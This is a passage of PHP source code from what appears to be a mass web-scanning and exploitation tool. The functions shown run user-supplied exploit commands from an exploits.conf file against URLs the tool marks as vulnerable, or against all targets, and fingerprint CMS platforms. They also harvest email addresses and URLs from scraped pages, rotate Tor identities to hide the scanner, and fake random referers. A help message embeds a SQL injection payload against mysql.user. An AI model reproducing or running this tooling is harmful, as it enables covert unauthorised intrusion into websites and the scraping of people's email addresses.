  1179. }
  1180.  
  1181. ################################################################################
  1182. #GET STATUS HTTP URL############################################################
  1183. ################################################################################
  1184.  
  1185. function __getStatusURL($url) {
  1186.  
  1187.     if (!is_null($url) && !empty($url)) {
  1188.         return FALSE;
  1189.     }
  1190.     __plus();
  1191.     $status = array();
  1192.     $curl = curl_init($url);
  1193.     curl_setopt($curl, CURLOPT_URL, $url);
  1194.     $resultadoCurl = curl_exec($curl);
  1195.     if ($resultadoCurl) {
  1196.         preg_match_all('(HTTP.*)', $resultadoCurl, $status['http']) . __plus();
  1197.  
  1198.         return (!is_null($status['http']) && !empty($status['http'])) ? TRUE : FALSE;
  1199.     }
  1200.     unset($curl);
  1201.     return FALSE;
  1202. }
  1203.  
  1204. ################################################################################
  1205. #BEEP ##########################################################################
  1206. ################################################################################
  1207.  
  1208. function __cli_beep() {
  1209.  
  1210.     echo ($_SESSION['config']['beep']) ? "\x07" : NULL;
  1211. }
  1212.  
  1213. ################################################################################
  1214. #SETUP TO RUN COMMANDS IN ID####################################################
  1215. ################################################################################
  1216.  
  1217. function __configExploitsExec($id, $alvo) {
  1218.  
  1219.     $resultadoURL = __configExploitsList();
  1220.     $final = array();
  1221.     $id_ = ((strstr($id, ','))) ? explode(',', $id) : array($id); // MULTIPLAS ID'S EXPLOITS
  1222.  
  1223.     foreach ($resultadoURL as $key) {
  1224.         $__key = strstr($key, '::') ? explode("\n", $key) : NULL;
  1225.         $final = is_array($__key) ? array_merge($final, $__key) : $final;
  1226.     }
  1227.     foreach ($id_ as $value) {
  1228.         $final__ = isset($value) && !empty($value) ? explode('::', $final[$value]) : NULL;
  1229.         $barra = "{$_SESSION["c1"]}[ INFO ]|___{$_SESSION["c0"]}\n";
  1230.         $barra.= "      {$_SESSION["c1"]}|";
  1231.         print !is_null($final__) ? "\n{$barra}[ EXPLOIT ]:: {$final__[0]} /[ ID ]:: {$value} /[ COMMAND ]:: " . $final__[1] : NULL;
  1232.         echo "\n      ------------------------------------------------------------------------------------------------------------------";
  1233.         print !is_null($final__) ? __command($final__[1], $alvo) : NULL;
  1234.         __plus();
  1235.     }
  1236. }
  1237.  
  1238. ################################################################################
  1239. #LIST COMMANDS FILE exploits.conf###############################################
  1240. ################################################################################
  1241.  
  1242. function __configExploitsList($op = NULL) {
  1243.  
  1244.     $resultadoURL = array_unique(array_filter(explode("\n", file_get_contents($_SESSION['config']['file_exploit_conf']))));
  1245.  
  1246.     if (!is_null($op)) {
  1247.         echo __bannerlogo();
  1248.         echo $_SESSION["c11"];
  1249.         echo "[*]__\n";
  1250.         echo "     |MENU EXPLOITS:";
  1251.         echo "\n     |ID TYPE_EXPLOIT::EXPLOIT_COMMAND";
  1252.         echo "\n     |FILE CONFIG: {$_SESSION['config']['file_exploit_conf']}";
  1253.         echo "\n     |USE COMMAND EX: --exploit-id '1,2,3,19'";
  1254.         echo "\n-----------------------------------------------------------------------------------------------------------------------\n";
  1255.         print_r($resultadoURL);
  1256.         __getOut("{$_SESSION['config']['line']}\n");
  1257.     } else {
  1258.         return is_array($resultadoURL) ? $resultadoURL : NULL;
  1259.     }
  1260. }
  1261.  
  1262. ################################################################################
  1263. #INSERT VALUES COMMANDS FILE exploits.conf######################################
  1264. ################################################################################
  1265.  
  1266. function __configExploitsADD($valor = NULL) {
  1267.  
  1268.     if (!is_null($valor) && preg_match("(([a-zA-Z0-9-].*)(::.*)([a-zA-Z0-9-]))", $valor)) {
  1269.         echo __bannerlogo();
  1270.         echo $_SESSION["c11"];
  1271.         echo "[*]__\n";
  1272.         echo "     |MENU EXPLOITS:";
  1273.         echo "\n     |ID TYPE_EXPLOIT::EXPLOIT_COMMAND";
  1274.         echo "\n     |STATUS: ADDED VALUE WITH SUCCESS!";
  1275.         echo "\n     |VALUE: {$valor}";
  1276.         echo "\n-----------------------------------------------------------------------------------------------------------------------\n";
  1277.         __saveValue($_SESSION['config']['file_exploit_conf'], __crypt($valor), 2);
  1278.         print_r(__configExploitsList());
  1279.         __getOut("{$_SESSION['config']['line']}\n");
  1280.     } else {
  1281.  
  1282.         __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]}INCORRECT FORMAT! / Format TYPE_EXPLOIT::EXPLOIT_COMMAND / ex: NMAP::nmap -sV _TARGET_\n");
  1283.     }
  1284. }
  1285.  
  1286. ################################################################################
  1287. #CHECK CMS######################################################################
  1288. ################################################################################
  1289.  
  1290. function __SimpleCheckCMS($html) {
  1291.  
  1292.     $cms['XOOPS CMS IDENTIFIED'] = '<meta name="generator" content="XOOPS"';
  1293.     $cms['Joomla CMS IDENTIFIED'] = '<meta name="generator" content="Joomla!';
  1294.     $cms['Wordpress CMS IDENTIFIED'] = '<meta name="generator" content="WordPress';
  1295.     $cms['SMF CMS IDENTIFIED-1'] = '<a href="http://www.simplemachines.org/" title="Simple Machines Forum" target="_blank">Powered by SMF';
  1296.     $cms['SMF CMS IDENTIFIED-2'] = '<a href="http://www.simplemachines.org/about/copyright.php" title="Free Forum Software" target="_blank">SMF';
  1297.     $cms['vBulletin CMS IDENTIFIED-1'] = '<meta name="generator" content="vBulletin';
  1298.     $cms['vBulletin CMS IDENTIFIED-2'] = 'Powered by <a href="http://www.vbulletin.com" id="vbulletinlink">vBulletin&trade;</a> Version';
  1299.     $cms['vBulletin CMS IDENTIFIED-3'] = 'powered by vBulletin';
  1300.     $cms['phpBB CMS IDENTIFIED'] = 'Powered by <a href="http://www.phpbb.com/">phpBB</a>';
  1301.     $cms['MyBB CMS IDENTIFIED'] = 'Powered By <a href="http://www.mybboard.net" target="_blank">MyBB</a>';
  1302.     $cms['Drupal CMS IDENTIFIED-1'] = 'name="Generator" content="Drupal';
  1303.     $cms['Drupal CMS IDENTIFIED-2'] = 'Drupal.settings';
  1304.     $cms['MODx CMS IDENTIFIED'] = '<a href="http://www.modx.com" target="_blank"> Powered by MODx</a>';
  1305.     $cms['SilverStripe CMS IDENTIFIED'] = '<meta name="generator" content="SilverStripe - http://silverstripe.org" />';
  1306.     $cms['Textpattern CMS IDENTIFIED'] = 'Powered by <a href="http://www.textpattern.com" title="Textpattern">Textpattern</a>';
  1307.     $cms['Adapt CMS IDENTIFIED'] = 'Powered by <a href="http://www.adaptcms.com">AdaptCMS';
  1308.     $cms['ATutor CMS IDENTIFIED'] = '<a href="/about.php">About ATutor</a>';
  1309.     $cms['b2evolution CMS IDENTIFIED'] = '<meta name="generator" content="b2evolution';
  1310.     $cms['Moodle CMS IDENTIFIED-1'] = 'Powered by <a href="http://moodle.org" title="Moodle">Moodle</a>';
  1311.     $cms['Moodle CMS IDENTIFIED-2 '] = '<meta name="key words" content="moodle, Course Management System " />';
  1312.     $cms['Moodle CMS IDENTIFIED-3'] = '://moodle';
  1313.     $cms['Moodle CMS IDENTIFIED-4'] = '://www.mood le';
  1314.     $cms['ATutor CMS IDENTIFIED'] = '<META NAME="GENERATOR" CONTENT="PHP-Nuke';
  1315.     $cms['PostNuke CMS IDENTIFIED'] = '<meta name="generator" content="PostNuke';
  1316.     $cms['CloudFlare IDENTIFIED-1'] = '<a href="http://www.cloudflare.com/" target="_blank" style=';
  1317.     $cms['CloudFlare IDENTIFIED-2'] = 'DDoS protection by CloudFlare</a>';
  1318.  
  1319.     foreach ($cms as $campo => $valor) {
  1320.  
  1321.         __plus();
  1322.         if (strstr($html, $cms[$campo])) {
  1323.             return(" {$campo} ");
  1324.         }
  1325.     }
  1326.     return "0xUNIDENTIFIED";
  1327. }
  1328.  
  1329. ################################################################################
  1330. #REPLACE THE SECURITIES URL#####################################################
  1331. ################################################################################
  1332.  
  1333. function __replace($exploit, $url) {
  1334.  
  1335.     $exploit_ = strstr($_SESSION['config']['replace'], '[INURL]') ?
  1336.             $exploit :
  1337.             __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}DEFINE THE CORRECT REPLACE COMMAND ex: --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user+from+mysql.user+limit+0,1)=1'{$_SESSION["c0"]}\n");
  1338.     $exploit = explode("[INURL]", $exploit_);
  1339.     $exploit[0] = (isset($exploit[0]) && !is_null($exploit[0])) ?
  1340.             $exploit[0] :
  1341.             __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}DEFINE THE CORRECT REPLACE COMMAND ex: --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user+from+mysql.user+limit+0,1)=1'{$_SESSION["c0"]}\n");
  1342.     $exploit[1] = (isset($exploit[0]) && !is_null($exploit[1])) ?
  1343.             $exploit[1] :
  1344.             __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}DEFINE THE CORRECT REPLACE COMMAND ex: --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user+from+mysql.user+limit+0,1)=1'{$_SESSION["c0"]}\n");
  1345.     return str_replace($exploit[0], $exploit[1], $url);
  1346. }
  1347.  
  1348. ################################################################################
  1349. #REMOVE VALUE URL###############################################################
  1350. ################################################################################
  1351.  
  1352. function __remove($value, $url) {
  1353.  
  1354.     return str_replace($value, NULL, $url);
  1355. }
  1356.  
  1357. ################################################################################
  1358. #VALID MENU OPTIONS#############################################################
  1359. ################################################################################
  1360.  
  1361. function __validateOptions($opArray, $validar, $op = NULL) {
  1362.  
  1363.     if (empty($validar) || empty($opArray)) {
  1364.         return FALSE;
  1365.     }
  1366.  
  1367.     $array = explode(',', $opArray);
  1368.     if (is_null($op)) {
  1369.         $busca = explode(',', $validar);
  1370.         for ($i = 0; $i <= count($busca); $i++) {
  1371.             if (in_array($busca[$i], $array)) {
  1372.                 return TRUE;
  1373.             }
  1374.         }
  1375.     } else {
  1376.         for ($i = 0; $i <= count($array); $i++) {
  1377.             if (strstr($validar, $array[$i])) {
  1378.                 return TRUE;
  1379.             }
  1380.         }
  1381.     }
  1382.     return FALSE;
  1383. }
  1384.  
  1385. ################################################################################
  1386. #VALIDATE OPERATING SYSTEM AND COLOR SYSTEM#####################################
  1387. ################################################################################
  1388.  
  1389. function __OS() {
  1390.  
  1391.     $sistema = strtoupper(PHP_OS);
  1392.     if (substr($sistema, 0, 3) == "WIN") {
  1393.         $i = 0;
  1394.         system("cls");
  1395.         $_SESSION["os"] = 1;
  1396.         while ($i <= 17) {
  1397.             $_SESSION["c{$i}"] = NULL;
  1398.             $i++;
  1399.         }
  1400.     } else {
  1401.         system("command clear");
  1402.         //DEFINING COLORS
  1403.         $_SESSION["c0"] = "\033[0m";      // END OF COLOR
  1404.         $_SESSION["c1"] = "\033[1;37m";   // WHITE
  1405.         $_SESSION["c2"] = "\033[1;33m";   // YELLOW
  1406.         $_SESSION["c3"] = "\033[1;31m";   // RED LIGHT
  1407.         $_SESSION["c4"] = "\033[32m";   // GREEN
  1408.         $_SESSION["c5"] = "\033[1;32m";   // GREEN LIGHT
  1409.         $_SESSION["c6"] = "\033[0;35m";   // PURPLE
  1410.         $_SESSION["c7"] = "\033[1;30m";   // DARK GREY
  1411.         $_SESSION["c8"] = "\033[0;34m";   // BLUE
  1412.         $_SESSION["c9"] = "\033[0;37m";   // LIGHT GREY
  1413.         $_SESSION["c10"] = "\033[0;33m";  // BROWN
  1414.         $_SESSION["c11"] = "\033[1;35m";  // LIGHT PURPLE
  1415.         $_SESSION["c12"] = "\033[0;31m";  // RED
  1416.         $_SESSION["c13"] = "\033[1;36m";  // LIGHT CYAN
  1417.         $_SESSION["c14"] = "\033[0;36m";  // CIANO
  1418.         $_SESSION["c15"] = "\033[1;34m";  // LIGHT BLUE
  1419.         $_SESSION["c16"] = "\033[02;31m"; // DARK RED
  1420.     }
  1421. }
  1422.  
  1423. ################################################################################
  1424. #SAVE URL VULNERABLE  COMMAND ECHO >> FILE######################################
  1425. ################################################################################
  1426.  
  1427. function __saveValue($arquivo, $valor, $op = NULL) {
  1428.  
  1429.     $path = !not_isnull_empty($_SESSION['config']['save-as']) ? $_SESSION['config']['out_put_paste'] : NULL;
  1430.     echo ($op == 1) ?
  1431.             "\n{$_SESSION["c1"]}|_[ + ]{$_SESSION["c7"]} VALUE SAVED IN THE FILE::{$_SESSION["c9"]} {$arquivo}{$_SESSION["c0"]}" : NULL;
  1432.     file_put_contents(($op == 2) ? $arquivo : $path . $arquivo, "{$valor}\n", FILE_APPEND);
  1433. }
  1434.  
  1435. ################################################################################
  1436. #CAPTURE ID KEY TO SEARCH LYCOS MAKE############################################
  1437. ################################################################################
  1438.  
  1439. function __getIdSearchLycos($html) {
  1440.  
  1441.     $match = NULL;
  1442.     preg_match_all("(val.*)", $html, $match);
  1443.     return (str_replace(');', '', str_replace('val(', '', str_replace("'", '', $match[0][4]))));
  1444. }
  1445.  
  1446. ################################################################################
  1447. #RENEW IP NETWORK TOR###########################################################
  1448. ################################################################################
  1449.  
  1450. function __renewTOR() {
  1451.  
  1452.     system("[ -z 'pidof tor' ] || pidof tor | xargs sudo kill -HUP;");
  1453.     $request__ = __request_info('http://dynupdate.no-ip.com/ip.php', $_SESSION["config"]["proxy"]);
  1454.     __plus();
  1455.     echo "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ IP NETWORK TOR RENEWED ]::: {$_SESSION["c1"]}[ {$request__['corpo'] } ]\n{$_SESSION["c0"]}";
  1456.     /* https://pt.wikipedia.org/wiki/Pidof
  1457.      * pidof é um utilitário Linux que encontra o ID de um programa em execução.
  1458.      * Note que o próprio nome é a junção dos termos pid, que significa identidade
  1459.      * de um processo e of que significa de. Portanto pidof quer dizer identidade
  1460.      * de processo de...
  1461.      * O equivalente no Solaris é pgrep. pidof firefox-bin O commando acima retorna
  1462.      * o pid do processo que está executando firefox-bin.
  1463.      * Pode-se combinar o commando 'pidof' com o commando kill dessa forma:
  1464.      * kill -9 $(pidof firefox-bin) pidof é simplesmente uma ligação simbólica
  1465.      * para o programa killall5,que está localizado em /sbin.
  1466.      */
  1467. }
  1468.  
  1469. ################################################################################
  1470. #This function will validate emails#############################################
  1471. ################################################################################
  1472.  
  1473. function __validateEmail($email) {
  1474.  
  1475.     $conta = "^[a-zA-Z0-9\._-]+@";
  1476.     $domino = "[a-zA-Z0-9\._-]+.";
  1477.     $extensao = "([a-zA-Z]{2,4})$";
  1478.  
  1479.     $pattern = $conta . $domino . $extensao;
  1480.  
  1481.     return (ereg($pattern, $email)) ? TRUE : FALSE;
  1482. }
  1483.  
  1484. ################################################################################
  1485. #This function will validate URLS###############################################
  1486. ################################################################################
  1487.  
  1488. function __validateURL($url) {
  1489.  
  1490.     if (preg_match("#\b(http[s]?://|ftp[s]?://){1,}?([-a-zA-Z0-9\.]+)([-a-zA-Z0-9\.]){1,}([-a-zA-Z0-9_\.\#\@\:%_/\?\=\~\-\//\!\'\(\)\s\^\:blank:\:punct:\:xdigit:\:space:\$]+)#si", $url)) {
  1491.         return TRUE;
  1492.     } else {
  1493.         return FALSE;
  1494.     }
  1495. }
  1496.  
  1497. ################################################################################
  1498. #This function will filter custom values########################################
  1499. ################################################################################
  1500.  
  1501. function __extractRegCustom($html, $url_) {
  1502.  
  1503.     $matches = NULL;
  1504.     __plus();
  1505.     preg_match_all("#\b{$_SESSION['config']['regexp-filter']}#i", $html, $matches);
  1506.  
  1507.     echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}\n";
  1508.     echo "{$_SESSION["c1"]} |_[ URL ] {$_SESSION["c0"]}=>{$_SESSION["c9"]} {$url_} {$_SESSION["c0"]}\n";
  1509.  
  1510.     $matches_ = array_filter(array_unique(array_unique($matches[0])));
  1511.     foreach ($matches_ as $valor) {
  1512.  
  1513.         if (not_isnull_empty($valor)) {
  1514.  
  1515.             echo "{$_SESSION["c1"]}__[ + ] {$_SESSION["c0"]}[\033[01;31m {$_SESSION['config']['cont_valores']} {$_SESSION["c0"]}]- {$valor}\n";
  1516.             $_SESSION["config"]["resultado_valores"].="{$valor}\n";
  1517.             __plus();
  1518.             __saveValue($_SESSION["config"]["arquivo_output"], $valor);
  1519.             $_SESSION['config']['cont_valores'] ++;
  1520.         }
  1521.         __plus();
  1522.     }
  1523.     __timeSec('delay', "\n");
  1524. }
  1525.  
  1526. ################################################################################
  1527. #This function will filter and mail each url####################################
  1528. ################################################################################
  1529.  
  1530. function __filterEmailif($resultados) {
  1531.  
  1532.     if (is_array($resultados)) {
  1533.         echo "{$_SESSION["c1"]}|_[ ! ][ INFO ]{$_SESSION["c16"]}[ FILTERING VALUE ]::{$_SESSION["c1"]}[ {$_SESSION["config"]['ifemail']} ]{$_SESSION["c0"]}\n";
  1534.         foreach ($resultados as $value) {
  1535.  
  1536.             $temp[] = (strstr($value, $_SESSION['config']['ifemail']) ? $value : NULL);
  1537.         }
  1538.  
  1539.         return array_unique(array_filter($temp));
  1540.     }
  1541.  
  1542.     RETURN FALSE;
  1543. }
  1544.  
  1545. ################################################################################
  1546. #This function extract emails###################################################
  1547. ################################################################################
  1548.  
  1549. function __extractEmail($html, $url_) {
  1550.  
  1551.     $matches = NULL;
  1552.     __plus();
  1553.     preg_match_all('/([\w\d\.\-\_]+)@([\w\d\.\_\-]+)/mi', $html, $matches);
  1554.     echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}\n";
  1555.     echo "{$_SESSION["c1"]}|_[ ! ][ INFO ][URL] :: {$_SESSION["c9"]} {$url_} {$_SESSION["c0"]}\n";
  1556.  
  1557.     $_matches = array_filter(array_unique(array_unique($matches[0])));
  1558.     $matches_ = (not_isnull_empty($_SESSION['config']['ifemail']) ? __filterEmailif($_matches) : $_matches);
  1559.  
  1560.     foreach ($matches_ as $valor) {
  1561.  
  1562.         if (__validateEmail($valor)) {
  1563.  
  1564.             echo "{$_SESSION["c1"]}|_[ + ]{$_SESSION["c0"]}[\033[01;31m {$_SESSION['config']['cont_valores']} {$_SESSION["c0"]}]- {$valor} "
  1565.             . (filter_var($valor, FILTER_VALIDATE_EMAIL) ?
  1566.                     "{$_SESSION["c14"]}[ OK ]{$_SESSION["c0"]}" : "{$_SESSION["c16"]}[ NO ]{$_SESSION["c0"]}") . "\n";
  1567.             (filter_var($valor, FILTER_VALIDATE_EMAIL) ? $_SESSION["config"]["resultado_valores"].="{$valor}\n" : NULL);
  1568.             __plus();
  1569.             (filter_var($valor, FILTER_VALIDATE_EMAIL) ? __saveValue($_SESSION["config"]["arquivo_output"], $valor) : NULL);
  1570.  
  1571.             $_SESSION['config']['cont_valores'] ++;
  1572.         }
  1573.         __plus();
  1574.     }
  1575.     __timeSec('delay', "\n");
  1576. }
  1577.  
  1578. ################################################################################
  1579. #This function will filter urls each url########################################
  1580. ################################################################################
  1581.  
  1582. function __extractURLs($html, $url_) {
  1583.  
  1584.     $matches = NULL;
  1585.     __plus();
  1586.     $reg_tag = 'href=\"|src=\"|value=\"';
  1587.     $reg = "#\b({$reg_tag}http[s]?://|{$reg_tag}ftp[s]?://){1,}?([-a-zA-Z0-9\.]+)([-a-zA-Z0-9\.]){1,}([-a-zA-Z0-9_\.\#\@\:%_/\?\=\~\-\//\!\'\(\)\s\^\:blank:\:punct:\:xdigit:\:space:\$]+)#si";
  1588.     preg_match_all($reg, $html, $matches);
  1589.     echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}\n";
  1590.     echo "{$_SESSION["c1"]} |_[ INFO ][URL] {$_SESSION["c0"]}=>{$_SESSION["c9"]} {$url_} {$_SESSION["c0"]}\n";
  1591.     echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}\n";
  1592.     $matches_ = array_unique(array_filter($matches[0]));
  1593.     $blacklist = $_SESSION["config"]['blacklist'];
  1594.     $blacklist_ = (isset($_SESSION["config"]["webcache"])) ? str_replace('webcache.,', '', $blacklist) : $blacklist;
  1595.  
  1596.     foreach ($matches_ as $valor) {
  1597.  
  1598.         $valor = __filterURLTAG($valor);
  1599.         if (__validateURL($valor) && !__validateOptions($blacklist_, $valor, 1)) {
  1600.             echo "{$_SESSION["c1"]}__[ + ]{$_SESSION["c0"]}[\033[01;31m {$_SESSION["config"]['cont_url']}"
  1601.             . " {$_SESSION["c9"]}]- {$valor}{$_SESSION["c0"]}\n";
  1602.             $_SESSION["config"]["resultado_valores"].="{$valor}\n";
  1603.             __plus();
  1604.             __saveValue($_SESSION["config"]["arquivo_output"], $valor) . __plus();
  1605.             $_SESSION["config"]["cont_url"] ++;
  1606.         }
  1607.         __plus();
  1608.     }
  1609.     __timeSec('delay', "\n");
  1610. }
  1611.  
  1612. ################################################################################
  1613. #This function removes the last regular expression ta###########################
  1614. ################################################################################
  1615.  
  1616. function __filterURLTAG($valor = NULL) {
  1617.  
  1618.     return(!is_null($valor)) ? str_replace('"', '', str_replace('href="', '', str_replace('src="', '', str_replace('value="', '', $valor)))) : NULL;
  1619. }
  1620.  
  1621. ################################################################################
  1622. #Esta função irá formatar salvar urls concatenadas##############################
  1623. ################################################################################
  1624.  
  1625. function __checkURLs($resultado, $url_) {
  1626.  
  1627.     __plus();
  1628.     $code = !is_null($_SESSION["config"]["ifcode"]) ? $_SESSION["config"]["ifcode"] : 200;
  1629.     $valor = ($resultado['server']['http_code'] == $code) ? "{$_SESSION["c4"]}" : NULL;
  1630.  
  1631.     echo "\n{$_SESSION["c1"]}  |_[ INFO ]{$_SESSION["c0"]}[{$_SESSION["c1"]} {$_SESSION['config']['cont_valores']} {$_SESSION["c0"]}]\n";
  1632.     echo "{$_SESSION["c1"]}  |_[ INFO ][URL] {$_SESSION["c0"]}::{$_SESSION["c9"]}{$valor} {$url_} {$_SESSION["c0"]}\n";
  1633.     echo "{$_SESSION["c1"]}  |_[ INFO ][STATUS]::{$valor} {$resultado['server']['http_code']} {$_SESSION["c0"]}\n";
  1634.  
  1635.     __timeSec('delay');
  1636.     echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}";
  1637.     __plus();
  1638.  
  1639.     $target_ = array('url_clean' => $url_, 'url_xpl' => $url_);
  1640.  
  1641.     if ($resultado == $code) {
  1642.  
  1643.         $_SESSION['config']['resultado_valores'].= "{$url_}\n";
  1644.         __saveValue($_SESSION["config"]["arquivo_output"], $url_) . __plus();
  1645.         __plus();
  1646.  
  1647.         (not_isnull_empty($_SESSION['config']['sub-file']) &&
  1648.                 is_array($_SESSION['config']['sub-file']) ? __subExecExploits($target_['url_xpl'], $_SESSION['config']['sub-file']) : NULL);
  1649.         __plus();
  1650.  
  1651.         (not_isnull_empty($_SESSION['config']['command-vul']) ? __command($_SESSION['config']['command-vul'], $target_) : NULL);
  1652.         __plus();
  1653.  
  1654.         (not_isnull_empty($_SESSION['config']['exploit-vul-id']) ?
  1655.                         __configExploitsExec($_SESSION['config']['exploit-vul-id'], $target_) : NULL);
  1656.         __plus();
  1657.     }
  1658.  
  1659.     (not_isnull_empty($_SESSION['config']['exploit-all-id']) ? __configExploitsExec($_SESSION['config']['exploit-all-id'], $target_) : NULL);
  1660.     __plus();
  1661.  
  1662.     (not_isnull_empty($_SESSION['config']['command-all']) ? __command($_SESSION['config']['command-all'], $target_) : NULL);
  1663.     __plus();
  1664.  
  1665.     $_SESSION['config']['cont_valores'] ++;
  1666.  
  1667.     __plus();
  1668. }
  1669.  
  1670. ################################################################################
  1671. #This function will send the contents of the output buffer (if any)#############
  1672. ################################################################################
  1673.  
  1674. function __plus() {
  1675.  
  1676.     ob_flush();
  1677.     flush();
  1678. }
  1679.  
  1680. ################################################################################
  1681. #FORMATTING POST################################################################
  1682. ################################################################################
  1683.  
  1684. function __convertUrlQuery($query) {
  1685.  
  1686.     $queryParts = explode('&', $query);
  1687.     $params = array();
  1688.     $match = array();
  1689.     foreach ($queryParts as $param) {
  1690.         $item = explode('=', $param);
  1691.         preg_match_all("([a-zA-Z0-9]=(.*))", $param, $match);
  1692.         $params[$item[0]] = ($match[1][0]);
  1693.     }
  1694.  
  1695.     return $params;
  1696. }
  1697.  
  1698. ################################################################################
  1699. #OPEN FILE BASE FOR VALIDATION##################################################
  1700. ################################################################################
  1701.  
  1702. function __openFile($arquivo, $op = NULL) {
  1703.  
  1704.     if (isset($arquivo) && !empty($arquivo)) {
  1705.         $resultadoURL = array_unique(array_filter(explode("\n", file_get_contents($arquivo))));
  1706.  
  1707.         if (is_array($resultadoURL)) {
  1708.  
  1709.             return ($op == 1 ? $resultadoURL : __process($resultadoURL));
  1710.         }
  1711.     }
  1712. }
  1713.  
  1714. ################################################################################
  1715. #CATCH INFORMATION IP###########################################################
  1716. ################################################################################
  1717.  
  1718. function __infoIP($ip, $op = 0) {
  1719.  
  1720.     /*
  1721.       [longitude] => 4.9
  1722.       [latitude] => 52.3667
  1723.       [asn] => AS196752
  1724.       [offset] => 2
  1725.       [ip] => 46.19.37.0
  1726.       [area_code] => 0
  1727.       [continent_code] => EU
  1728.       [dma_code] => 0
  1729.       [timezone] => Europe/Amsterdam
  1730.       [country_code] => NL
  1731.       [isp] => Tilaa B.V.
  1732.       [country] => Netherlands
  1733.       [country_code3] => NLD
  1734.      */
  1735.  
  1736.     preg_match_all('#\b(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})#si', $ip, $ip);
  1737.     if (filter_var($ip[0][0], FILTER_VALIDATE_IP)) {
  1738.         if ($op == 0) {
  1739.             $request__ = __request_info("http://www.telize.com/geoip/{$ip[0][0]}", $_SESSION["config"]["proxy"], NULL);
  1740.             __plus();
  1741.             return json_decode($request__['corpo'], TRUE);
  1742.         } else {
  1743.             $_SESSION['config']['verifica_info'] = NULL;
  1744.             $request__ = __request_info("http://www.telize.com/geoip/{$ip[0][0]}", $_SESSION["config"]["proxy"], NULL);
  1745.             $return = json_decode($request__['corpo'], TRUE);
  1746.             __plus();
  1747.             return "{$return['city']} /{$return['country']} - {$return['country_code']} /{$return['continent_code']} , ISP: {$return['isp']}";
  1748.         }
  1749.     }
  1750. }
  1751.  
  1752. ################################################################################
  1753. #CAPTURE URL POSITION IN BROWSER ALEXA / RELEVANCE OF SUCH URL##################
  1754. ################################################################################
  1755.  
  1756. function __positionAlexa($url) {
  1757.  
  1758.     $xmlSimple = simplexml_load_file("http://data.alexa.com/data?cli=10&dat=snbamz&url={$url}");
  1759.     $resultRank = $xmlSimple->SD[1];
  1760.     __plus();
  1761.     if ($resultRank) {
  1762.         $retornoRank = $resultRank->REACH->attributes()->RANK;
  1763.     } else {
  1764.         $retornoRank = 0;
  1765.     }
  1766.     return $retornoRank . __plus();
  1767. }
  1768.  
  1769. ################################################################################
  1770. #GENERATE URL REFERENCE random##################################################
  1771. ################################################################################
  1772.  
  1773. function __setURLReferenceRandom() {
  1774.  
  1775.     $dominio = array('Adzuna', 'Bixee', 'CareerBuilder', 'Craigslist', 'Dice', 'Eluta.ca', 'Hotjobs', 'JobStreet', 'Incruit', 'Indeed', 'Glassdoor', 'LinkUp', 'Monster', 'Naukri',
  1776.         'Yahoo', 'Legal', 'GoogleScholar', 'Lexis', 'Manupatra', 'Quicklaw', 'WestLaw', 'Medical', 'Bing Health', 'Bioinformatic', 'CiteAb', 'EB-eye', 'Entrez', 'mtv', 'ubuntu',
  1777.         'GenieKnows', 'GoPubMed', 'Healia', 'Healthline', 'Nextbio', 'PubGene', 'Quertle', 'Searchmedica', 'WebMD', 'News', 'BingNews', 'Daylife', 'GoogleNews', 'aol', 'microsoft',
  1778.         'MagPortal', 'Newslookup', 'Nexis', 'Topix', 'Trapit', 'YahooNews', 'People', 'Comfibook', 'Ex.plode', 'InfoSpace', 'PeekYou', 'Spock', 'Spokeo', 'WorldwideHelpers', 'iPhone',
  1779.         'Zabasearch', 'ZoomInfo', 'Fizber', 'HotPads', 'Realtor', 'Redfin', 'Rightmove', 'Trulia', 'Zillow', 'Zoopla', 'StuRents', 'globo', 'sbt', 'band', 'cnn', 'blog.inurl.com.br'
  1780.     );
  1781.  
  1782.     $gTLD = array('aero', 'arpa', 'biz', 'com', 'coop', 'edu', 'gov', 'info', 'int', 'mil', 'museum', 'name', 'net', 'org', 'pro', 'tel');
  1783.  
  1784.     $arquivo = array('admin', 'index', 'wp-admin', 'info', 'shop', 'file', 'out', 'open', 'news', 'add', 'profile', 'search', 'open', 'photo', 'insert', 'view');
  1785.     $ext = array('exe', 'php', 'asp', 'aspx', 'jsf', 'html', 'htm', 'lua', 'log', 'cgi', 'sh', 'css', 'py', 'sql', 'xml', 'rss');
  1786.  
  1787.     $pasta = array('App_Files', 'Assets', 'CFFileServlet', 'CFIDE', 'Communication', 'Computers', 'CoreAdminHome', 'CoreHome', 'Crawler', 'Creator',
  1788.         'DECOM', 'Dashboard', 'Drives', 'Dynamic', 'FCKeditor', 'Feedback', 'Files', 'Flash', 'Forms', 'Help', 'ICEcore', 'IO', 'Image', 'JPG', 'getold',
  1789.         'JSP', 'KFSI', 'Laguna', 'Login', 'Motors', 'MultiSites', 'NR', 'OCodger', 'RSS', 'Safety', 'Smarty', 'Software', 'Static', 'Stress', 'getfull',
  1790.         'Sugarcrm', 'Travel', 'UPLOAD', 'Urussanga', 'UserFiles', '__tpl', '_fckeditor', '_info', '_machine', '_plugins', '_sample', '_samples', 'postmost',
  1791.         '_source', '_testcases', 'aaa', 'abelardoluz', 'aberlardoluz', 'aborto', 'about', 'aboutus', 'abuse', 'abusers', 'ac_drives', 'acabamentos', 'mail',
  1792.         'academias', 'acao', 'acartpro', 'acatalog', 'acc', 'acc_auto_del', 'acc_beep_ken', 'acc_beep_time', 'acc_ch_mail', 'acc_fc_prsc', 'accounts', 'validar',
